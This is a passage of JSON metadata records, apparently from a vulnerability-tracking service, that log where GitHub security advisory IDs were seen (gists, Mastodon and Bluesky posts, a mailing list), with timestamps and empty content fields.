"seen", "source": "https://gist.github.com/safer-bot/de1d2f168ac8c68d04050981a1883ee7", "content": "", "creation_timestamp": "2025-07-16T04:52:26.000000Z"}, {"uuid": "e8ffcd6f-94b2-447b-b571-2733901776e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/de1d2f168ac8c68d04050981a1883ee7", "content": "", "creation_timestamp": "2025-07-16T04:52:26.000000Z"}, {"uuid": "8b191b25-794a-4341-9779-60177f1ded99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vrpq-qp53-qv56", "type": "seen", "source": "https://gist.github.com/safer-bot/f88791fb8dd5727ee64f5ce6af65b97b", "content": "", "creation_timestamp": "2025-07-16T09:31:10.000000Z"}, {"uuid": "b8b0001e-f090-42e8-8f78-ae01485195f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9cmq-m9j5-mvww", "type": "seen", "source": "https://gist.github.com/safer-bot/f88791fb8dd5727ee64f5ce6af65b97b", "content": "", "creation_timestamp": "2025-07-16T09:31:10.000000Z"}, {"uuid": "05f659e0-c061-4bb0-a588-14047da6807c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73m2-qfq3-56cx", "type": "seen", "source": "https://gist.github.com/safer-bot/f88791fb8dd5727ee64f5ce6af65b97b", "content": "", "creation_timestamp": "2025-07-16T09:31:10.000000Z"}, {"uuid": "fbbf6ceb-228b-48a8-8689-a6befbc0f03e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/de1d2f168ac8c68d04050981a1883ee7", "content": "", "creation_timestamp": "2025-07-16T04:52:26.000000Z"}, {"uuid": "7b2e6c19-76ba-46b6-ac0b-39ade6f3a8e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3p86-9955-h393", "type": "seen", "source": "https://gist.github.com/safer-bot/de1d2f168ac8c68d04050981a1883ee7", "content": "", "creation_timestamp": "2025-07-16T04:52:26.000000Z"}, {"uuid": "6f5782a5-eaea-442f-97d3-09ad20308dcd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/f88791fb8dd5727ee64f5ce6af65b97b", "content": "", "creation_timestamp": "2025-07-16T09:31:10.000000Z"}, {"uuid": "084a31f5-4d7d-4dce-89d3-f49237049791", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9h3v-h59j-v6rj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114666228731243092", "content": "", "creation_timestamp": "2025-06-11T18:49:57.324037Z"}, {"uuid": "de9751ee-2dd2-4035-b0b3-db92f60af6db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8w3f-4r8f-pf53", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114854540813397770", "content": "", "creation_timestamp": "2025-07-15T01:00:12.024506Z"}, {"uuid": "87a48ff2-e616-442e-95fe-3044bb5ec3f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/3422d28bc7f88495dabd182ccee52910", "content": "", "creation_timestamp": "2025-07-16T04:55:50.000000Z"}, {"uuid": "05d438c2-c0d6-4caa-8244-579ab143d2c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/3422d28bc7f88495dabd182ccee52910", "content": "", "creation_timestamp": "2025-07-16T04:55:50.000000Z"}, {"uuid": "636236fc-0611-4d22-8b83-4ae35b91b978", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/f88791fb8dd5727ee64f5ce6af65b97b", "content": "", "creation_timestamp": "2025-07-16T09:31:10.000000Z"}, {"uuid": "85709863-802a-4ce2-b5e5-a3e527a379e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/f88791fb8dd5727ee64f5ce6af65b97b", "content": "", "creation_timestamp": "2025-07-16T09:31:10.000000Z"}, {"uuid": "4440959b-d61b-4bb6-ba27-2e7dc23b2082", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/f88791fb8dd5727ee64f5ce6af65b97b", "content": "", "creation_timestamp": "2025-07-16T09:31:10.000000Z"}, {"uuid": "fc72ece4-5383-4b2d-98a3-414e207a049a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4h98-2769-gh6h", "type": "seen", "source": "https://gist.github.com/0xi1y4an7/605ea54aa36cbd993d66a4e7d1674901", "content": "", "creation_timestamp": "2025-05-14T23:15:09.000000Z"}, {"uuid": "227e445a-c659-4bde-8164-b931242cb835", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pfwf-h6m3-63wf", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114508750783243761", "content": "", "creation_timestamp": "2025-05-14T23:21:14.790571Z"}, {"uuid": "7449df5e-c7a4-4a03-b845-49db053d3d85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pfwf-h6m3-63wf", "type": "seen", "source": "https://bsky.app/profile/bluesky.awakari.com/post/3lp65bpgnmm2e", "content": "", "creation_timestamp": "2025-05-14T23:21:34.856380Z"}, {"uuid": "afadad74-fcaf-4d83-9560-c417d9c58af3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/7e41cd98739b152a5cbc9436836d99e7", "content": "", "creation_timestamp": "2025-07-16T05:11:32.000000Z"}, {"uuid": "121f278c-ce20-4827-a656-3f565e520bf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hq9p-pm7w-8p54", "type": "seen", "source": "https://gist.github.com/safer-bot/fd8139e9308cf0388a34823a4e1cc3f4", "content": "", "creation_timestamp": "2025-07-16T05:11:00.000000Z"}, {"uuid": "73c4c7b5-8420-48e1-80d9-a79532416803", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4wp7-92pw-q264", "type": "seen", "source": "https://gist.github.com/safer-bot/82f31fcfbaf8bf9c17bb37bf21fc4c58", "content": "", "creation_timestamp": "2025-07-16T09:35:59.000000Z"}, {"uuid": "cbda4909-d9d3-46dd-8654-c499cf3a6964", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/50f5ce5c46262e64cc86a3000ffff26a", "content": "", "creation_timestamp": "2025-07-16T11:22:46.000000Z"}, {"uuid": "f3d621fb-8f2c-4136-b867-e404b72e5d3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/5c50faba7bb4f4a3b807fa4e4fecb5b8", "content": "", "creation_timestamp": "2025-07-16T12:59:22.000000Z"}, {"uuid": "7c337448-4079-4b14-a1e3-2bac76943006", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hgqp-3mmf-7h8f", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q2/273", "content": "", "creation_timestamp": "2025-06-23T23:32:45.000000Z"}, {"uuid": "531fc765-6c2c-4f15-ab2b-46bc121de55e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gvfx-p3h5-qf65", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114830141628115070", "content": "", "creation_timestamp": "2025-07-10T17:35:09.680481Z"}, {"uuid": "21400e6d-dd4e-4b71-83d6-1ca934aef1ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2q6r-344g-cx46", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114546430468372798", "content": "", "creation_timestamp": "2025-05-21T15:03:41.113029Z"}, {"uuid": "99fe956e-3f18-463c-bb2a-70641eb9c2a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q7p4-7xjv-j3wf", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114596709195699004", "content": "", "creation_timestamp": "2025-05-30T12:10:13.297039Z"}, {"uuid": "7d35d07e-f497-455e-9067-dd2ca7fa3df5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7f8r-222p-6f5g", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114678070916509879", "content": "", "creation_timestamp": "2025-06-13T21:01:34.754720Z"}, {"uuid": "548c2b9f-5fd0-426e-884d-6fa3057d38a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6vqp-h455-42mr", "type": "seen", "source": "https://gist.github.com/safer-bot/014f297397f1fe30eed9a48a00d1d283", "content": "", "creation_timestamp": "2025-07-16T03:55:56.000000Z"}, {"uuid": "459903bf-999c-434e-9a70-1f0562442e85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2h3j-m7gr-25xj", "type": "seen", "source": "https://gist.github.com/safer-bot/014f297397f1fe30eed9a48a00d1d283", "content": "", "creation_timestamp": "2025-07-16T03:55:56.000000Z"}, {"uuid": "bc999cdb-d6d5-4c72-9f3c-88e363181f95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/2a067dd2ffacc367711dcc42ab83691b", "content": "", "creation_timestamp": "2025-07-16T08:46:49.000000Z"}, {"uuid": "697ee1f0-0ec4-448e-a963-307d35bea48a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fg3j-q579-v8x4", "type": "seen", "source": "https://gist.github.com/safer-bot/014f297397f1fe30eed9a48a00d1d283", "content": "", "creation_timestamp": "2025-07-16T03:55:56.000000Z"}, {"uuid": "47740991-2ecd-4dca-831c-eb555d876f53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/2a067dd2ffacc367711dcc42ab83691b", "content": "", "creation_timestamp": "2025-07-16T08:46:49.000000Z"}, {"uuid": "c0f213dc-d462-4e84-bafc-ec27e28e77c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/2a067dd2ffacc367711dcc42ab83691b", "content": "", "creation_timestamp": "2025-07-16T08:46:49.000000Z"}, {"uuid": "83a94336-ebfa-4808-9129-62514885bc8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-668q-qrv7-99fm", "type": "seen", "source": "https://gist.github.com/safer-bot/2a067dd2ffacc367711dcc42ab83691b", "content": "", "creation_timestamp": "2025-07-16T08:46:49.000000Z"}, {"uuid": "e584b365-aa2e-469a-bff6-d379ff68167b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/2a067dd2ffacc367711dcc42ab83691b", "content": "", "creation_timestamp": "2025-07-16T08:46:49.000000Z"}, {"uuid": "8e8dda46-0316-47c2-92ba-6c1636e9c48a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/2a067dd2ffacc367711dcc42ab83691b", "content": "", "creation_timestamp": "2025-07-16T08:46:49.000000Z"}, {"uuid": "e264aa59-e09b-4f92-9a45-6036e4dc573e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/2a067dd2ffacc367711dcc42ab83691b", "content": "", "creation_timestamp": "2025-07-16T08:46:49.000000Z"}, {"uuid": "c7e3065b-56d1-4a5b-87ad-f83ef638ca9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7grw-6pjh-jpc9", "type": "seen", "source": "https://gist.github.com/safer-bot/014f297397f1fe30eed9a48a00d1d283", "content": "", "creation_timestamp": "2025-07-16T03:55:56.000000Z"}, {"uuid": "98118a04-dfb6-45a6-bf8d-7576c05ce766", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/2a067dd2ffacc367711dcc42ab83691b", "content": "", "creation_timestamp": "2025-07-16T08:46:49.000000Z"}, {"uuid": "6bb05f7f-cca0-48a2-bdb3-b5887edea683", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/00b68cc5e12330d9350cd01ab279b6eb", "content": "", "creation_timestamp": "2025-07-16T10:38:45.000000Z"}, {"uuid": "893be2ca-a721-4149-ac93-9e65aa8c343d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3vqj-43w4-2q58", "type": "seen", "source": "https://gist.github.com/safer-bot/00b68cc5e12330d9350cd01ab279b6eb", "content": "", "creation_timestamp": "2025-07-16T10:38:45.000000Z"}, {"uuid": "a2b0a438-f90b-4285-ab99-09d2702ab6f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/25f3ccad651ed0a69d3748442bb3df20", "content": "", "creation_timestamp": "2025-07-16T12:47:24.000000Z"}, {"uuid": "b2890730-c935-4d73-a582-01e6d3d47855", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/1caaae65aa52f2baea445a2c8e5e649a", "content": "", "creation_timestamp": "2025-07-16T13:34:25.000000Z"}, {"uuid": "091c6076-edec-4bd8-b3b3-7ea247b5f88d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3mc7-4q67-w48m", "type": "seen", "source": "https://gist.github.com/safer-bot/f17dd9ec05eaa98cd94e7e32cd52f5f8", "content": "", "creation_timestamp": "2025-07-16T03:58:10.000000Z"}, {"uuid": "a996a799-b3ec-4534-8786-6455cadb0aae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/f17dd9ec05eaa98cd94e7e32cd52f5f8", "content": "", "creation_timestamp": "2025-07-16T03:58:10.000000Z"}, {"uuid": "6ebca51a-8f74-47ec-a7ba-5a7c355a9a3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w37g-rhq8-7m4j", "type": "seen", "source": "https://gist.github.com/safer-bot/f17dd9ec05eaa98cd94e7e32cd52f5f8", "content": "", "creation_timestamp": "2025-07-16T03:58:10.000000Z"}, {"uuid": "cfb69748-5f10-4f54-8eef-6462aaef9a57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-98wm-3w3q-mw94", "type": "seen", "source": "https://gist.github.com/safer-bot/f17dd9ec05eaa98cd94e7e32cd52f5f8", "content": "", "creation_timestamp": "2025-07-16T03:58:10.000000Z"}, {"uuid": "b8fe0618-bbd5-47d6-b974-0ab218ef869a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-889j-63jv-qhr8", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114473807351732745", "content": "", "creation_timestamp": "2025-05-08T19:14:40.279971Z"}, {"uuid": "7a828763-639c-4a76-8272-5cbbb9d5e6fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q4rv-gq96-w7c5", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114473807351732745", "content": "", "creation_timestamp": "2025-05-08T19:14:40.372706Z"}, {"uuid": "34e4a997-a851-47e5-bd11-1e7e40574f78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g8qw-mgjx-rwjr", "type": "seen", "source": "https://bsky.app/profile/timb-machine.infosec.exchange.ap.brid.gy/post/3lt76ittsxh42", "content": "", "creation_timestamp": "2025-07-05T06:59:30.237348Z"}, {"uuid": "22bc613b-1ddc-4ee8-8478-281c4d460ca5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/8372a8ab08e15144decf09cb17bfe0a3", "content": "", "creation_timestamp": "2025-07-16T04:32:34.000000Z"}, {"uuid": "68d49a33-fdce-4c43-bddd-e3c114ad9608", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/8372a8ab08e15144decf09cb17bfe0a3", "content": "", "creation_timestamp": "2025-07-16T04:32:34.000000Z"}, {"uuid": "35b37825-95e3-488c-a2f4-3b5c43115a2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/8372a8ab08e15144decf09cb17bfe0a3", "content": "", "creation_timestamp": "2025-07-16T04:32:34.000000Z"}, {"uuid": "8c2a85d1-faed-4cc5-a19f-cec2e03bf794", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xq3w-v528-46rv", "type": "seen", "source": "https://gist.github.com/safer-bot/42c52b7475f1deb88e5e54007f9a06a5", "content": "", "creation_timestamp": "2025-07-16T09:05:51.000000Z"}, {"uuid": "d49d17c8-dd2d-4028-a273-1a76d67ea5e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/45933a69f437440b7f18a4500149377e", "content": "", "creation_timestamp": "2025-07-16T10:52:33.000000Z"}, {"uuid": "5703a511-2e58-447e-a533-20936e358c9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/45933a69f437440b7f18a4500149377e", "content": "", "creation_timestamp": "2025-07-16T10:52:33.000000Z"}, {"uuid": "94ba5bc9-5aa7-432e-a9b6-c2fc05ca08b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/9f045c38340848c1e4194fe8d01c9d57", "content": "", "creation_timestamp": "2025-07-16T12:50:04.000000Z"}, {"uuid": "54a48143-4db5-4d46-a32b-7475e5606571", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/9f045c38340848c1e4194fe8d01c9d57", "content": "", "creation_timestamp": "2025-07-16T12:50:04.000000Z"}, {"uuid": "0c2bf083-e04c-4d87-be77-0184ed3fb4b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/9f045c38340848c1e4194fe8d01c9d57", "content": "", "creation_timestamp": "2025-07-16T12:50:04.000000Z"}, {"uuid": "d73ff937-3ded-4774-9196-517bd690b62b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/35290a8dbed9617245066a9f02ddd471", "content": "", "creation_timestamp": "2025-07-16T13:39:03.000000Z"}, {"uuid": "a91da35c-8a3d-4f44-a0be-eb7fc2e076ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/f5f3094bc77dfd093071700d86d96ae1", "content": "", "creation_timestamp": "2025-07-16T04:34:22.000000Z"}, {"uuid": "e2b6f6b7-ed4a-4fe6-8ce8-5a94bef06f77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/f5f3094bc77dfd093071700d86d96ae1", "content": "", "creation_timestamp": "2025-07-16T04:34:22.000000Z"}, {"uuid": "dc81276a-dacd-4fa4-bb9d-e2292ddfabd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-389x-839f-4rhx", "type": "seen", "source": "https://gist.github.com/safer-bot/42c52b7475f1deb88e5e54007f9a06a5", "content": "", "creation_timestamp": "2025-07-16T09:05:51.000000Z"}, {"uuid": "ffd4999a-9ba9-4397-abd3-f6708ddf67fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/45933a69f437440b7f18a4500149377e", "content": "", "creation_timestamp": "2025-07-16T10:52:33.000000Z"}, {"uuid": "56e5fdec-0b00-4e9c-ad98-c94a1e7b207e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2x2g-32r7-p4x8", "type": "seen", "source": "https://gist.github.com/safer-bot/45933a69f437440b7f18a4500149377e", "content": "", "creation_timestamp": "2025-07-16T10:52:33.000000Z"}, {"uuid": "b114665e-41be-41e6-9cf3-1138f4899597", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/265f1b12a24e93faff13eba03ae42f94", "content": "", "creation_timestamp": "2025-07-16T12:55:06.000000Z"}, {"uuid": "81a6df7f-57db-45b5-9165-35f3580b6798", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/e2cb94a520ba9d822e3ae16ca29c6a51", "content": "", "creation_timestamp": "2025-07-16T12:54:33.000000Z"}, {"uuid": "c85156c6-4ec4-48bf-9059-5aaec923378b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/e2cb94a520ba9d822e3ae16ca29c6a51", "content": "", "creation_timestamp": "2025-07-16T12:54:33.000000Z"}, {"uuid": "7a70bf36-1c0a-4d53-9bb6-f7a2b800c700", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57j2-w4cx-62h2", "type": "seen", "source": "https://gist.github.com/safer-bot/e2cb94a520ba9d822e3ae16ca29c6a51", "content": "", "creation_timestamp": "2025-07-16T12:54:33.000000Z"}, {"uuid": "2cabf673-b52b-4acc-9712-442e2e2f75e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2f88-5hg8-9x2x", "type": "seen", "source": "https://gist.github.com/safer-bot/35290a8dbed9617245066a9f02ddd471", "content": "", "creation_timestamp": "2025-07-16T13:39:03.000000Z"}, {"uuid": "08ba8cc7-849d-4d58-83c1-c224dea739ac", 